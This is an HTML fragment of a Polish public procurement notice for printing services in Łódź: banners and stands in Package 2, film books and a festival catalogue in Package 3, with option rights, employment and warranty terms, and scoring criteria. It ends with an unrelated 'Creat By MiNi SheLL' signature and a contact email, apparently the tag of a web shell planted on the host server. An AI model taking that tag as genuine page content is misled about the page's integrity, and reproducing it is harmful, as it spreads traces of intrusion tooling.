collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena za zamówienie podstawowe</td><td style="border: 1px solid black;border-collapse: collapse;">55,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena za prawo opcji</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Jakość</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>PAKIET 2 - Usługi specjlalistyczne poligraficzne</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Nazwa zadania: 2) PAKIET 2 - Usługi specjalistyczne poligraficzne Krótki opis przedmiotu zamówienia: Przedmiotem zamówienia jest sukcesywne świadczenie usług poligraficznych wraz z montażem banerów:PAKIET 2 - Usługi specjalistyczne poligraficzne:Lp.	Przedmiot zamówienia	Nakład Ilość nakładów (zamówienie podstawowe)	Ilość nakładów (prawo opcji)1.	Baner formatu 13,4x10,2m 1	2	2.	Baner, wydruk pełnokolorowy, nakład podany w metrach kwadratowych	550	1	3.	Tablice, pvc spiennione 3mm, nakład podany w metrach kwadratowych	250	1	4.	Kanwas, nakład podany w metrach kwadratowych	20	1	5.	Naklejka, różne kształty, nakład podany w metrach kwadratowych	2	10	16.	Stand, format 2x2m	3	1	37.	Dibond srebrny, drapany,nakład podany w metrach kwadratowych. 50 18.	Roll-up, format netto 1000x2000mm 1	7	Na realizację przedmiotu zamówienia składają się następujące etapy:w PAKIECIE 2:a) usługi drukowania,b) usługi montażu i demontażu lub opakowanie i transport do siedziby Zamawiającego lub innych miejsc przez niego wskazanych, znajdujących się w granicach administracyjnych Miasta Łodzi.Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) dla każdej części/pakietu zawarty został w Formularzu asortymentowo-cenowym, stanowiącym Załącznik nr 3 do SIWZ.PRAWO OPCJI:Zamawiający przewiduje możliwość skorzystania z prawa opcji w zakresie świadczenia usług poligraficznych dotyczących następującego asortymentu określonego:w PAKIECIE 2:- w poz. 5 (Naklejka, różne kształty) w ilości 1 nakładu,- w poz. 6 (Stand, format 2x2m) w ilości 3 nakładów,- w poz. 7 (Dibond srebrny, drapany) w ilości 1 nakładu,o parametrach takich samych jak wskazane w Załączniku nr 3 do SIWZ (Formularz asortymentowo-cenowy). Zamawiający, w ramach prawa opcji, może nabyć pełną ilość nakładu asortymentu lub tylko część. Szczegółowe warunki realizacji prawa opcji zostały uregulowane w ISTOTNYCH POSTANOWIENIACH UMOWY, stanowiących Załącznik nr 1b do SIWZ (dla PAKIETU 2). Zamawiający zastrzega, iż może skorzystać z prawa opcji do końca obowiązywania umowy zawartej w wyniku przeprowadzonego postępowania. RÓWNOWAŻNOŚĆ:Wobec wszelkich wskazanych i wymaganych w SIWZ norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencyjnych oraz certyfikatów, Zamawiający dopuszcza rozwiązania równoważne. Podane przez Zamawiającego nazwy, znaki towarowe mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu. Zamawiający dopuszcza składanie ofert równoważnych. Za ,,produkt równoważny", Zamawiający będzie uznawał produkt o nie gorszych parametrach technicznych, niż wskazane w opisie przedmiotu zamówienia.ZATRUDNIENIE NA PODSTAWIE UMOWY O PRACĘ:Zamawiający, mając na uwadze treść art. 29 ust. 3a ustawy Pzp, wymaga zatrudnienia przez Wykonawcę lub podwykonawcę, na podstawie umowy o pracę - w rozumieniu przepisów art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t.jedn.: Dz.U. z 2018 r., poz. 917 ze zm.), osób wykonujących następujące czynności w zakresie realizacji zamówienia:w PAKIECIE 2:a) usługi drukarskieprzez okres obowiązywania umowy z Wykonawcą.Zasady dokumentowania zatrudnienia przez Wykonawcę osób na umowę o pracę oraz kontroli wykonania przedmiotowego obowiązku i sankcji z tytułu ich nieprzestrzegania, zostały określone w § 4 i § 7 Istotnych postanowień umowy, stanowiących Załącznik nr 1b do SIWZ.GWARANCJA:Wykonawca zobowiązany będzie udzielić gwarancji jakości i rękojmi za wady na okres minimum 24 miesięcy na wykonane i dostarczone materiały wielkoformatowe w zakresie PAKIETU 2.Okres gwarancji liczy się od daty podpisania właściwego protokołu zdawczo-odbiorczego.ISTOTNE POSTANOWIENIA UMOWY Szczegółowe warunki realizacji zamówienia określają: ,,ISTOTNE POSTANOWIENIA UMOWY" stanowiące Załącznik nr 1b do SIWZ (dla PAKIETU 2).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>79823000-9, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena za zamówienie podstawowe</td><td style="border: 1px solid black;border-collapse: collapse;">55,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena za prawo opcji</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Jakość</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>PAKIET 3 - Usługi w zakresie wydawnictw zwartych</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Nazwa zadania: 3) PAKIET 3 - Usługi w zakresie wydawnictw zwartych Krótki opis przedmiotu zamówienia: Przedmiotem zamówienia jest sukcesywne świadczenie usług poligraficznych wraz z dystrybucją niektórych pozycji asortymentowych:PAKIET 3 - Usługi w zakresie wydawnictw zwartych:Lp.	Przedmiot zamówienia	Nakład Ilość nakładów (zamówienie podstawowe)	Ilość nakładów (prawo opcji)1.	Wydawnictwo zwarte: On the History of Film Style, David Bordwell, ilość stron: 340, Nr ISBN	300	1	2.	Wydawnictwo zwarte: Sergei Eisenstein, wybór tekstów, ilość stron: 290, Nr ISBN	300 13.	Wydawnictwo zwarte: Alfabetyzm filmowy, ilość stron: 200, Nr ISBN	300 14.	Wydawnictwo zwarte: Katalog wystawy Sztuka DC. Świt Superbohaterów, ilość stron: 264, Nr ISBN	1000	1	5.	Katalog 30. MFKiG oraz publikacja okolicznościowa 30. MFGiK, ilość stron: 168, Nr ISBN	500	2	Na realizację przedmiotu zamówienia składają się następujące etapy:w PAKIECIE 3:a) przygotowanie materiałów do druku (prepress),b) usługi drukowania (press),c) usługi introligatorskie (postpress),c) opakowanie, ubezpieczenie i transport do siedziby Zamawiającego lub innych miejsc przez niego wskazanych, znajdujących się w granicach administracyjnych Miasta Łodzi, z zastrzeżeniem pkt IV.4. SIWZ.Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) dla każdej części/pakietu zawarty został w Formularzu asortymentowo-cenowym, stanowiącym Załącznik nr 3 do SIWZ.PRAWO OPCJI:Zamawiający przewiduje możliwość skorzystania z prawa opcji w zakresie świadczenia usług poligraficznych dotyczących następującego asortymentu określonego:w PAKIECIE 3:- w poz. 2 (Wydawnictwo zwarte: Sergei Eisenstein, wybór tekstów) w ilości 1 nakładu,- w poz. 3 (Wydawnictwo zwarte: Alfabetyzm filmowy) w ilości 1 nakładu,o parametrach takich samych jak wskazane w Załączniku nr 3 do SIWZ (Formularz asortymentowo-cenowy). Zamawiający, w ramach prawa opcji, może nabyć pełną ilość nakładu asortymentu lub tylko część. Szczegółowe warunki realizacji prawa opcji zostały uregulowane w ISTOTNYCH POSTANOWIENIACH UMOWY, stanowiących odpowiednio Załącznik nr 1c do SIWZ (dla PAKIETU 3). Zamawiający zastrzega, iż może skorzystać z prawa opcji do końca obowiązywania umowy zawartej w wyniku przeprowadzonego postępowania. Wykonawca w ramach realizacji przedmiotu zamówienia zobowiązany jest przekazać do bibliotek uprawnionych do otrzymywania bibliotecznych egzemplarzy obowiązkowych, zgodnie z ustawą o obowiązkowych egzemplarzach bibliotecznych, publikacje wskazane w PAKIECIE 3 w pozycjach od nr 1 do nr 5. Lista bibliotek oraz ilość obowiązkowych egzemplarzy znajduje się pod adresem:http://www.bn.org.pl/dla-wydawcow/egzemplarz-obowiazkowy/liczba-egzemplarzy-obowiazkowych/. Przesyłki zawierające egzemplarz obowiązkowy są zwolnione z opłat pocztowych.Wykonawca zobowiązany jest przekazać egzemplarze obowiązkowe w następujących terminach:Bibliotece Narodowej - w ciągu 5 dni od zakończenia procesu produkcji publikacji;pozostałym bibliotekom - w ciągu 14 dni od zakończenia procesu produkcji publikacji.PODSTAWA PRAWNAo Ustawa z dnia 7 listopada 1996 r. o obowiązkowych egzemplarzach bibliotecznych (t.jedn.: Dz.U. 2018, poz. 545),o Rozporządzenie Ministra Kultury i Sztuki z dnia 6 marca 1997 r. w sprawie wykazu bibliotek uprawnionych do otrzymywania egzemplarzy obowiązkowych poszczególnych rodzajów publikacji oraz zasad ich przekazywania (Dz.U. 1997, nr 29, poz. 161, ze zm.).RÓWNOWAŻNOŚĆ:Wobec wszelkich wskazanych i wymaganych w SIWZ norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencyjnych oraz certyfikatów, Zamawiający dopuszcza rozwiązania równoważne. Podane przez Zamawiającego nazwy, znaki towarowe mają charakter przykładowy, a ich wskazanie ma na celu określenie oczekiwanego standardu. Zamawiający dopuszcza składanie ofert równoważnych. Za ,,produkt równoważny", Zamawiający będzie uznawał produkt o nie gorszych parametrach technicznych, niż wskazane w opisie przedmiotu zamówienia.ZATRUDNIENIE NA PODSTAWIE UMOWY O PRACĘ:Zamawiający, mając na uwadze treść art. 29 ust. 3a ustawy Pzp, wymaga zatrudnienia przez Wykonawcę lub podwykonawcę, na podstawie umowy o pracę - w rozumieniu przepisów art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t.jedn.: Dz.U. z 2018 r., poz. 917 ze zm.), osób wykonujących następujące czynności w zakresie realizacji zamówienia:w PAKIECIE 3:a) usługi CTP,b) usługi drukarskie,c) usługi introligatorskie;przez okres obowiązywania umowy z Wykonawcą.Zasady dokumentowania zatrudnienia przez Wykonawcę osób na umowę o pracę oraz kontroli wykonania przedmiotowego obowiązku i sankcji z tytułu ich nieprzestrzegania, zostały określone w § 4 i § 7 Istotnych postanowień umowy (dla każdego z pakietów), stanowiących Załącznik nr 1c do SIWZ.GWARANCJA:Wykonawca zobowiązany będzie udzielić gwarancji jakości i rękojmi za wady na okres minimum 24 miesięcy na wykonane i dostarczone wydawnictwa zwarte w zakresie PAKIETU 3.Okres gwarancji liczy się od daty podpisania właściwego protokołu zdawczo-odbiorczego.ISTOTNE POSTANOWIENIA UMOWY Szczegółowe warunki realizacji zamówienia określają: ,,ISTOTNE POSTANOWIENIA UMOWY" stanowiące Załącznik nr 1c do SIWZ (dla PAKIETU 3).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>79823000-9, 79824000-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena za zamówienie podstawowe</td><td style="border: 1px solid black;border-collapse: collapse;">55,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena za prawo opcji</td><td style="border: 1px solid black;border-collapse: collapse;">5,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Jakość</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com